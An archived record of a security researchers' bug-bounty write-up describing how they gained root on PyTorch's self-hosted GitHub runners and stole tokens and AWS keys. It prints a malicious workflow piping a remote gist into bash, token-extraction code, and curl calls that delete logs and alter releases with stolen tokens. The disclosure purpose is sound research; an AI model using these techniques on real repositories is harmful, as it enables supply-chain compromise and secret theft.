{
	"id": "f37a369a-7866-43ba-ac5d-9a7697f4a1cb",
	"created_at": "2026-04-06T00:21:29.300646Z",
	"updated_at": "2026-04-10T13:11:25.057341Z",
	"deleted_at": null,
	"sha1_hash": "88a4c727e306f5418f8aeb2e985c3ba7228809aa",
	"title": "Playing with Fire – How We Executed a Critical Supply Chain Attack on PyTorch",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5849838,
	"plain_text": "Playing with Fire – How We Executed a Critical Supply Chain\r\nAttack on PyTorch\r\nPublished: 2024-01-11 · Archived: 2026-04-05 22:45:48 UTC\r\nSecurity tends to lag behind adoption, and AI/ML is no exception. \r\nFour months ago, Adnan Khan and I exploited a critical CI/CD vulnerability in PyTorch, one of the world’s leading\r\nML platforms. Used by titans like Google, Meta, Boeing, and Lockheed Martin, PyTorch is a major target for\r\nhackers and nation-states alike. \r\nThankfully, we exploited this vulnerability before the bad guys.\r\nHere is how we did it.\r\nBackground\r\nBefore we dive in, let’s scope out and discuss why Adnan and I were looking at an ML repository. Let me give you\r\na hint — it was not to gawk at the neural networks. In fact, I don’t know enough about neural networks to be\r\nqualified to gawk.\r\nPyTorch was one of the first steps on a journey Adnan and I started six months ago, based on CI/CD research and\r\nexploit development we performed in the summer of 2023. Adnan started the bug bounty foray by leveraging these\r\nattacks to exploit a critical vulnerability in GitHub that allowed him to backdoor all of GitHub’s and Azure’s runner\r\nimages, collecting a $20,000 reward. Following this attack, we teamed up to discover other vulnerable repositories.\r\nThe results of our research surprised everyone, including ourselves, as we continuously executed supply chain\r\ncompromises of leading ML platforms, billion-dollar Blockchains, and more. In the seven days since we\r\nreleased our initial blog posts, they’ve caught on in the security world. \r\nBut, you probably didn’t come here to read about our journey; you came to read about the messy details of our\r\nattack on PyTorch. 
Let’s begin.\r\nTell Me the Impact\r\nOur exploit path resulted in the ability to upload malicious PyTorch releases to GitHub, upload releases to AWS, potentially add code to the main repository branch, backdoor PyTorch dependencies – the list goes on. In short, it was bad. Quite bad.\r\nAs we’ve seen before with SolarWinds, Ledger, and others, supply chain attacks like this are killer from an attacker’s perspective. With this level of access, any respectable nation-state would have several paths to a PyTorch supply chain compromise.\r\nGitHub Actions Primer\r\nhttps://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/\r\nPage 1 of 21\r\nTo understand our exploit, you need to understand GitHub Actions.\r\nWant to skip around? Go ahead.\r\n1. Background\r\n2. Tell Me the Impact\r\n3. GitHub Actions Primer\r\n1. Self-Hosted Runners\r\n4. Identifying the Vulnerability\r\n1. Identifying Self-Hosted Runners\r\n2. Determining Workflow Approval Requirements\r\n3. Searching for Impact\r\n5. Executing the Attack\r\n1. Fixing a Typo\r\n2. Preparing the Payload\r\n6. Post Exploitation\r\n1. The Great Secret Heist\r\n1. The Magical GITHUB_TOKEN\r\n2. Covering our Tracks\r\n3. Modifying Repository Releases\r\n4. Repository Secrets\r\n5. PAT Access\r\n6. AWS Access\r\n7. Submission Details – No Bueno\r\n1. Timeline\r\n8. Mitigations\r\n9. Is PyTorch an Outlier?\r\n10. References\r\nIf you’ve never worked with GitHub Actions or similar CI/CD platforms, I recommend reading up before continuing this blog post. Actually, if I lose you at any point, go and Google the technology that confused you. Typically, I like to start from the very basics in my articles, but explaining all the involved CI/CD processes would be a novel in itself.\r\nIn short, GitHub Actions allows the execution of code specified within workflows as part of the CI/CD process. 
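To make that concrete, here is a minimal, hypothetical workflow file of the kind described here; the job, step, and file contents are invented for illustration, not taken from PyTorch:\r\n```yaml\r\n# Hypothetical example: run the repository's tests on every pull request.\r\nname: tests\r\non:\r\n  pull_request:\r\njobs:\r\n  test:\r\n    runs-on: ubuntu-latest  # GitHub-hosted; swapping in a self-hosted label is what makes fork PRs risky\r\n    steps:\r\n      - uses: actions/checkout@v4\r\n      - run: python -m pytest\r\n```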
\r\nFor example, let’s say PyTorch wants to run a set of tests when a GitHub user submits a pull request. PyTorch can define these tests in a YAML workflow file used by GitHub Actions and configure the workflow to run on the pull_request trigger. Now, whenever a user submits a pull request, the tests will execute on a runner. This way, repository maintainers don’t need to manually test everyone’s code before merging.\r\nThe public PyTorch repository uses GitHub Actions extensively for CI/CD. Actually, extensively is an understatement. PyTorch has over 70 different GitHub workflows and typically runs over ten workflows every hour. One of the most difficult parts of this operation was scrolling through all of the different workflows to select the ones we were interested in.\r\nGitHub Actions workflows execute on two types of build runners. One type is GitHub’s hosted runners, which GitHub maintains and hosts in their environment. The other class is self-hosted runners.\r\nSelf-Hosted Runners\r\nSelf-hosted runners are build agents hosted by end users running the Actions runner agent on their own infrastructure. In less technical terms, a “self-hosted runner” is a machine, VM, or container configured to run GitHub workflows from a GitHub organization or repository. Securing and protecting the runners is the responsibility of end users, not GitHub, which is why GitHub recommends against using self-hosted runners on public repositories. Apparently, not everyone listens to GitHub, including GitHub.\r\nIt doesn’t help that some of GitHub’s default settings are less than secure. By default, when a self-hosted runner is attached to a repository, any of that repository’s workflows can use that runner. This setting also applies to workflows from fork pull requests. 
Remember that anyone can submit a fork pull request to a public GitHub repository. Yes, even you. The result of these settings is that, by default, any repository contributor can execute code on the self-hosted runner by submitting a malicious PR.\r\nNote: A “contributor” to a GitHub repository is anyone who has added code to the repository. Typically, someone becomes a contributor by submitting a pull request that then gets merged into the default branch. More on this later.\r\nIf the self-hosted runner is configured using the default steps, it will be a non-ephemeral self-hosted runner. This means that the malicious workflow can start a process in the background that will continue to run after the job completes, and modifications to files (such as programs on the PATH) will persist past the current workflow. It also means that future workflows will run on that same runner.\r\nIdentifying the Vulnerability\r\nIdentifying Self-Hosted Runners\r\nTo identify self-hosted runners, we ran Gato, a GitHub attack and exploitation tool developed by Praetorian. Among other things, Gato can enumerate the existence of self-hosted runners within a repository by examining GitHub workflow files and run logs.\r\nGato identified several persistent, self-hosted runners used by the PyTorch repository. We looked at repository workflow logs to confirm the Gato output.\r\nThe name “worker-rocm-amd-30” indicates the runner is self-hosted.\r\nDetermining Workflow Approval Requirements\r\nEven though PyTorch used self-hosted runners, one major thing could still stop us.\r\nThe default setting for workflow execution from fork PRs requires approval only for accounts that have not previously contributed to the repository. 
However, there is an option to require approval for workflows from all fork PRs, including those from previous contributors. We set out to discover the status of this setting.\r\nViewing the pull request (PR) history, we found several PRs from previous contributors that triggered pull_request workflows without requiring approval. This indicated that the repository did not require workflow approval for fork PRs from previous contributors. Bingo.\r\nNobody had approved this fork PR workflow, yet the “Lint / quick-checks / linux-job” workflow ran on pull_request, indicating the default approval setting was likely in place.\r\nSearching for Impact\r\nBefore executing these attacks, we like to identify GitHub secrets that we may be able to steal after landing on the runner. Workflow files revealed several GitHub secrets used by PyTorch, including but not limited to:\r\n“aws-pytorch-uploader-secret-access-key”\r\n“aws-access-key-id”\r\n“GH_PYTORCHBOT_TOKEN” (GitHub Personal Access Token)\r\n“UPDATEBOT_TOKEN” (GitHub Personal Access Token)\r\n“conda-pytorchbot-token”\r\nWe were psyched when we saw the GH_PYTORCHBOT_TOKEN and UPDATEBOT_TOKEN. A PAT is one of your most valuable weapons if you want to launch a supply chain attack.\r\nUsing self-hosted runners to compromise GitHub secrets is not always possible. Much of our research has been around self-hosted runner post-exploitation: figuring out methods to go from runner to secrets. PyTorch provided a great opportunity to test these techniques in the wild.\r\nExecuting the Attack\r\n1. Fixing a Typo\r\nWe needed to be a contributor to the PyTorch repository to execute workflows without approval, but we didn’t feel like spending time adding features to PyTorch. 
Instead, we found a typo in a markdown file and submitted a fix. Another win for the Grammar Police.\r\nYes, I’m re-using this meme from my last article, but it fits too well.\r\n2. Preparing the Payload\r\nNow we had to craft a workflow payload that would allow us to obtain persistence on the self-hosted runner. Red Teamers know that installing persistence in production environments typically isn’t as trivial as a reverse Netcat shell. EDR, firewalls, packet inspection, and more can be in play, particularly in large corporate environments.\r\nWhen we started these attacks, we asked ourselves the following question – what could we use for Command and Control (C2) that we knew for sure would bypass EDR, with traffic that would not be blocked by any firewall? The answer is elegant and obvious – we could install another self-hosted GitHub runner and attach it to our private GitHub organization.\r\nOur “Runner on Runner” (RoR) technique uses the same servers for C2 as the existing runner, and the only binary we drop is the official GitHub runner agent binary, which is already running on the system. See ya, EDR and firewall protections.\r\nWe created a script to automate the runner registration process and included that as our malicious workflow payload. Storing our payload in a gist, we submitted a malicious draft PR. 
The modified workflow looked something like this:\r\nname: \"🚨 pre-commit\"\r\nrun-name: \"Refactoring and cleanup\"\r\non:\r\n  pull_request:\r\n    branches:\r\n      - main\r\njobs:\r\n  build:\r\n    name: Linux ARM64\r\n    runs-on: ${{ matrix.os.system }}\r\n    strategy:\r\n      matrix:\r\n        os: [\r\n          {system: \"ARM64\", name: \"Linux ARM64\"},\r\n          {system: \"benchmark\", name: \"Linux Intel\"},\r\n          {system: \"glue-notify\", name: \"Windows Intel\"}\r\n        ]\r\n    steps:\r\n      - name: Lint Code Base\r\n        continue-on-error: true\r\n        env:\r\n          SYSTEM_NAME: ${{ matrix.os.name }}\r\n        run: curl \u003cGIST_URL\u003e | bash\r\nThis workflow executes the RoR gist payload on three of PyTorch’s self-hosted runners – a Linux ARM64 machine named “ARM64”, an Intel device named “benchmark,” and a Windows box named “glue-notify.”\r\nEnabling draft status ensured that repository maintainers wouldn’t receive a notification. However, with the complexity of PyTorch’s CI/CD environment, I’d be surprised if they noticed either way. We submitted the PR and installed our RoR C2 on each self-hosted runner.\r\nWe used our C2 repository to execute the pwd \u0026\u0026 ls /home \u0026\u0026 ip a command on the runner labeled “jenkins-worker-rocm-amd-34”, confirming stable C2 and remote code execution. We also ran sudo -l to confirm we had root access.\r\nPost Exploitation\r\nWe now had root on a self-hosted runner. So what? We had seen previous reports of gaining RCE on self-hosted runners, and they were often met with ambiguous responses due to their ambiguous impact. Given the complexity of these attacks, we wanted to demonstrate a legitimate impact on PyTorch to convince them to take our report seriously. 
And we had some cool new post-exploitation techniques we’d been wanting to try.\r\nThe Great Secret Heist\r\nIn cloud and CI/CD environments, secrets are king. When we began our post-exploitation research, we focused on the secrets an attacker could steal and leverage in a typical self-hosted runner setup. Most of the secret stealing starts with the GITHUB_TOKEN.\r\nThe Magical GITHUB_TOKEN\r\nTypically, a workflow needs to check out a GitHub repository to the runner’s filesystem, whether to run tests defined in the repository, commit changes, or even publish releases. The workflow can use a GITHUB_TOKEN to authenticate to GitHub and perform these operations. GITHUB_TOKEN permissions can vary from read-only access to extensive write privileges over the repository. If a workflow executes on a self-hosted runner and uses a GITHUB_TOKEN, that token will be on the runner for the duration of that build.\r\nPyTorch had several workflows that used the actions/checkout step with a GITHUB_TOKEN that had write permissions. For example, by searching through workflow logs, we can see the periodic.yml workflow also ran on the jenkins-worker-rocm-amd-34 self-hosted runner. The logs confirmed that this workflow used a GITHUB_TOKEN with extensive write permissions.\r\nThis token would only be valid for the life of that particular build. However, we developed some special techniques to extend the build length once you are on the runner (more on this in a future post). 
Due to the insane number of workflows that run daily from the PyTorch repository, we were not worried about tokens expiring, as we could always compromise another one.\r\nWhen a workflow uses the actions/checkout step, the GITHUB_TOKEN is stored in the .git/config file of the checked-out repository on the self-hosted runner during an active workflow. Since we controlled the runner, all we had to do was wait until a non-PR workflow ran on the runner with a privileged GITHUB_TOKEN and then print out the contents of the config file.\r\nWe used our RoR C2 to steal the GITHUB_TOKEN of an ongoing workflow with write permissions.\r\nCovering our Tracks\r\nOur first use of the GITHUB_TOKEN was to eliminate the run logs from our malicious pull request. We wanted a full day to perform post-exploitation and didn’t want to raise any alarms with our activity. We used the GitHub API along with the token to delete the run logs for each of the workflows our PR triggered. Stealth mode = activated.\r\ncurl -L \\\r\n  -X DELETE \\\r\n  -H \"Accept: application/vnd.github+json\" \\\r\n  -H \"Authorization: Bearer $STOLEN_TOKEN\" \\\r\n  -H \"X-GitHub-Api-Version: 2022-11-28\" \\\r\n  https://api.github.com/repos/pytorch/pytorch/actions/runs/\u003crun_id\u003e/logs\r\nIf you want a challenge, you can try to discover the workflows associated with our initial malicious PR and observe that the logs no longer exist. In reality, they likely wouldn’t have caught our workflows anyway. 
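Incidentally, the .git/config credential theft described above takes only a few lines to script. The sketch below is a minimal illustration, not our actual tooling; the config contents and token value are fabricated. It parses the basic-auth extraheader entry that actions/checkout persists in the checked-out repository’s .git/config and recovers the embedded token:\r\n```python\r\nimport base64\r\nimport re\r\nfrom typing import Optional\r\n\r\ndef extract_checkout_token(git_config: str) -> Optional[str]:\r\n    \"\"\"Recover the GITHUB_TOKEN from the basic-auth header that\r\n    actions/checkout persists in a checked-out repo's .git/config.\"\"\"\r\n    match = re.search(r\"AUTHORIZATION: basic ([A-Za-z0-9+/=]+)\", git_config)\r\n    if match is None:\r\n        return None\r\n    # The header decodes to \"x-access-token:<token>\"\r\n    user_and_token = base64.b64decode(match.group(1)).decode()\r\n    return user_and_token.split(\":\", 1)[1]\r\n\r\n# Fabricated stand-in for the .git/config that actions/checkout writes\r\n# on the runner for the duration of a build; the token is not real.\r\nsample_config = (\r\n    '[http \"https://github.com/\"]\\n'\r\n    \"\\textraheader = AUTHORIZATION: basic \"\r\n    + base64.b64encode(b\"x-access-token:ghs_EXAMPLEONLY0000\").decode()\r\n)\r\n\r\nprint(extract_checkout_token(sample_config))  # -> ghs_EXAMPLEONLY0000\r\n```\r\nIn practice, an attacker on the runner would simply read the real .git/config out of the runner’s work directory while a privileged build is active.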
PyTorch has so many workflow runs that it reaches the limit for a single repository after a few days.\r\nModifying Repository Releases\r\nUsing the token, we could upload an asset claiming to be a pre-compiled, ready-to-use PyTorch binary and add a release note with instructions to download and run the binary. Any users who downloaded the binary would then be running our code. If the current source code assets were not pinned to the release commit, the attacker could overwrite those assets directly. As a POC, we used the following cURL request to modify the name of a PyTorch GitHub release. We just as easily could have uploaded our own assets.\r\ncurl -L \\\r\n  -X PATCH \\\r\n  -H \"Accept: application/vnd.github+json\" \\\r\n  -H \"Authorization: Bearer $GH_TOKEN\" \\\r\n  -H \"X-GitHub-Api-Version: 2022-11-28\" \\\r\n  https://api.github.com/repos/pytorch/pytorch/releases/102257798 \\\r\n  -d '{\"tag_name\":\"v2.0.1\",\"name\":\"PyTorch 2.0.1 Release, bug fix release (- John Stawinski)\"}'\r\nAs a POC, we added my name to the latest PyTorch release at the time. A malicious attacker could execute a similar API request to replace the latest release artifact with their malicious artifact.\r\nRepository Secrets\r\nIf backdooring PyTorch repository releases sounds fun, well, that is only a fraction of the impact we achieved when we looked at repository secrets.\r\nThe PyTorch repository used GitHub secrets to allow the runners to access sensitive systems during the automated release process. The repository used a lot of secrets, including several sets of AWS keys and the GitHub Personal Access Tokens (PATs) discussed earlier.\r\nSpecifically, the weekly.yml workflow used the GH_PYTORCHBOT_TOKEN and UPDATEBOT_TOKEN secrets to authenticate to GitHub. 
GitHub Personal Access Tokens (PATs) are often overprivileged, making them a great target for attackers. This workflow did not run on a self-hosted runner, so we couldn’t wait for a run and then steal the secrets from the filesystem (a technique we use frequently).\r\nThe weekly.yml workflow used two PATs as secrets. This workflow called the _update-commit-hash workflow, which specified use of a GitHub-hosted runner.\r\nEven though this workflow wouldn’t run on our runner, the GITHUB_TOKENs we could compromise had actions:write privileges. We could use the token to trigger workflows with the workflow_dispatch event. Could we use that to run our malicious code in the context of the weekly.yml workflow?\r\nWe had some ideas but weren’t sure whether they’d work in practice. So, we decided to find out.\r\nIt turns out that you can’t use a GITHUB_TOKEN to modify workflow files. However, we discovered several creative…“workarounds”…that will let you add malicious code to a workflow using a GITHUB_TOKEN. In this scenario, weekly.yml used another workflow, which used a script outside the .github/workflows directory. We could add our code to this script in our branch. Then, we could trigger that workflow on our branch, which would execute our malicious code.\r\nIf this sounds confusing, don’t worry; it also confuses most bug bounty programs. Hopefully, we’ll get to provide an in-depth look at this and our other post-exploitation techniques at a certain security conference in LV, NV. If we don’t get that opportunity, we’ll cover our other methods in a future blog post.\r\nBack to the action. 
To execute this phase of the attack, we compromised another GITHUB_TOKEN and used it to clone the PyTorch repository. We created our own branch, added our payload, and triggered the workflow.\r\nAs a stealth bonus, we changed our git username in the commit to pytorchmergebot, so that our commits and workflows appeared to be triggered by the pytorchmergebot user, who interacted frequently with the PyTorch repository.\r\nOur payload ran in the context of the weekly.yml workflow, which used the GitHub secrets we were after. The payload encrypted the two GitHub PATs and printed them to the workflow log output. We protected the private encryption key so that only we could perform decryption.\r\nWe triggered the weekly.yml workflow on our citesting1112 branch using the following cURL command.\r\ncurl -L \\\r\n  -X POST \\\r\n  -H \"Accept: application/vnd.github+json\" \\\r\n  -H \"Authorization: Bearer $STOLEN_TOKEN\" \\\r\n  -H \"X-GitHub-Api-Version: 2022-11-28\" \\\r\n  https://api.github.com/repos/pytorch/pytorch/actions/workflows/weekly.yml/dispatches \\\r\n  -d '{\"ref\":\"citesting1112\"}'\r\nNavigating to the PyTorch “Actions” tab, we saw our encrypted output containing the PATs in the results of the “Weekly” workflow.\r\nFinally, we canceled the workflow run and deleted the logs.\r\nPAT Access\r\nAfter decrypting the GitHub PATs, we enumerated their access with Gato.\r\nWe decrypted the PATs with our private key.\r\nGato revealed the PATs had access to over 93 repositories within the PyTorch organization, including many private repos and administrative access over several. These PATs provided multiple paths to supply chain compromise.\r\nFor example, if an attacker didn’t want to bother with tampering with releases, they could likely add code directly to the main branch of PyTorch. 
The main branch was protected, but the PAT belonging to pytorchbot could create a new branch and add its own code, and then the PAT belonging to pytorchupdatebot could approve the PR. We could then use pytorchmergebot to trigger the merge.\r\nWe didn’t use that attack path to add code to the main branch, but existing PyTorch PRs indicated it was possible. Even if an attacker couldn’t push directly to the main branch, there are other paths to supply chain compromise.\r\nIf the threat actor wanted to be more stealthy, they could add their malicious code to one of the other private or public repositories used by PyTorch within the PyTorch organization. These repositories had less visibility and were less likely to be closely reviewed. Or, they could smuggle their code into a feature branch, steal more secrets, or use any number of creative techniques to compromise the PyTorch supply chain.\r\nAWS Access\r\nTo prove that the PAT compromise was not a one-off, we decided to steal more secrets – this time, AWS keys.\r\nWe won’t bore you with all the details, but we executed a similar attack to the one above to steal the aws-pytorch-uploader-secret-access-key and aws-access-key-id belonging to the pytorchbot AWS user. These AWS keys had privileges to upload PyTorch releases to AWS, providing another path to backdoor PyTorch releases. 
The impact of this attack would depend on the sources that pulled releases from AWS and the other assets in this AWS account.\r\nWe used the AWS CLI to confirm the AWS credentials belonged to the pytorchbot AWS user.\r\nWe listed the contents of the “pytorch” bucket, revealing many sensitive artifacts, including PyTorch releases.\r\nWe discovered production PyTorch artifacts and confirmed write access to S3. We later confirmed that the PyTorch website pulls directly from these releases, so backdooring releases in these S3 buckets would allow an attacker to compromise any user that downloaded PyTorch from the PyTorch website, whether manually or with a `pip install`.\r\nThere were other sets of AWS keys, GitHub PATs, and various credentials we could have stolen, but we believed we had a clear demonstration of impact at this point. Given the critical nature of the vulnerability, we wanted to submit the report as soon as possible, before one of PyTorch’s 3,500 contributors decided to make a deal with a foreign adversary.\r\nA full attack path diagram.\r\nSubmission Details – No Bueno\r\nOverall, the PyTorch submission process was blah, to use a technical term. They frequently had long response times, and their fixes were questionable.\r\nWe also learned this wasn’t the first time they had issues with self-hosted runners – earlier in 2023, Marcus Young executed a pipeline attack to gain RCE on a single PyTorch runner. 
Marcus did not perform the post-exploitation techniques we used to demonstrate impact, but PyTorch still should have locked down their runners after his submission. Marcus’ report earned him a $10,000 bounty.\r\nWe haven’t investigated PyTorch’s new setup enough to provide our opinion on their solution to securing their runners. Rather than require approval for contributors’ fork PRs, PyTorch opted to implement a layer of controls to prevent abuse.\r\nTimeline\r\nAugust 9th, 2023 – Report submitted to Meta bug bounty\r\nAugust 10th, 2023 – Report “sent to appropriate product team”\r\nSeptember 8th, 2023 – We reached out to Meta to ask for an update\r\nSeptember 12th, 2023 – Meta said there was no update to provide\r\nOctober 16th, 2023 – Meta said “we consider the issue mitigated, if you think this wasn’t fully mitigated, please let us know.”\r\nOctober 16th, 2023 – We responded by saying we believed the issue had not been fully mitigated.\r\nNovember 1st, 2023 – We reached out to Meta, asking for another update.\r\nNovember 21st, 2023 – Meta responded, saying they reached out to a team member to provide an update.\r\nDecember 7th, 2023 – After not receiving an update, we sent a strongly worded message to Meta, expressing our concerns about the disclosure process and the delay in remediation.\r\nDecember 7th, 2023 – Meta responded, saying they believed the issue was mitigated and the delay was regarding the bounty.\r\nDecember 7th, 2023 – Several back-and-forths ensued discussing remediation.\r\nDecember 15th, 2023 – Meta awarded a $5,000 bounty, plus 10% due to the delay in payout.\r\nDecember 15th, 2023 – Meta provided more detail as to the remediation steps they performed after the initial vulnerability disclosure and offered to set up a call if we had more questions.\r\nDecember 16th, 2023 – We responded, 
opting not to set up a call, and asked a question about bounty payout (at this point, we were pretty done with looking at PyTorch).\r\nMitigations\r\nThe easiest way to mitigate this class of vulnerability is to change the default setting of ‘Require approval for first-time contributors’ to ‘Require approval for all outside collaborators’. It is a no-brainer for any public repository that uses self-hosted runners to ensure they use the restrictive setting, although PyTorch seems to disagree.\r\nIf workflows from fork PRs are necessary, organizations should only use GitHub-hosted runners. If self-hosted runners are also necessary, use isolated, ephemeral runners and ensure you know the risks involved.\r\nIt is challenging to design a solution that allows anyone to run arbitrary code on your infrastructure without risk, especially in an organization like PyTorch that thrives on community contributions.\r\nIs PyTorch an Outlier?\r\nThe issues surrounding these attack paths are not unique to PyTorch. They’re not unique to ML repositories or even to GitHub. We’ve repeatedly demonstrated supply chain weaknesses by exploiting CI/CD vulnerabilities in the world’s most advanced technological organizations across several CI/CD platforms, and those are only a small subset of the greater attack surface.\r\nThreat actors are starting to catch on, as shown by the year-over-year increase in supply chain attacks. Security researchers won’t always be able to find these vulnerabilities before malicious attackers.\r\nBut in this case, the researchers got there first.\r\nWant to hear more? 
Subscribe to the official John IV newsletter to receive live, monthly updates on my interests and passions.\r\nReferences\r\nhttps://johnstawinski.com/2024/01/05/worse-than-solarwinds-three-steps-to-hack-blockchains-github-and-ml-through-github-actions/\r\nhttps://adnanthekhan.com/2023/12/20/one-supply-chain-attack-to-rule-them-all/\r\nhttps://marcyoung.us/post/zuckerpunch/\r\nhttps://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/\r\nhttps://karimrahal.com/2023/01/05/github-actions-leaking-secrets/\r\nhttps://github.com/nikitastupin/pwnhub\r\nhttps://0xn3va.gitbook.io/cheat-sheets/ci-cd/github/actions\r\nhttps://owasp.org/www-project-top-10-ci-cd-security-risks/\r\nSource: https://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://johnstawinski.com/2024/01/11/playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch/"
	],
	"report_names": [
		"playing-with-fire-how-we-executed-a-critical-supply-chain-attack-on-pytorch"
	],
	"threat_actors": [],
	"ts_created_at": 1775434889,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/88a4c727e306f5418f8aeb2e985c3ba7228809aa.pdf",
		"text": "https://archive.orkl.eu/88a4c727e306f5418f8aeb2e985c3ba7228809aa.txt",
		"img": "https://archive.orkl.eu/88a4c727e306f5418f8aeb2e985c3ba7228809aa.jpg"
	}
}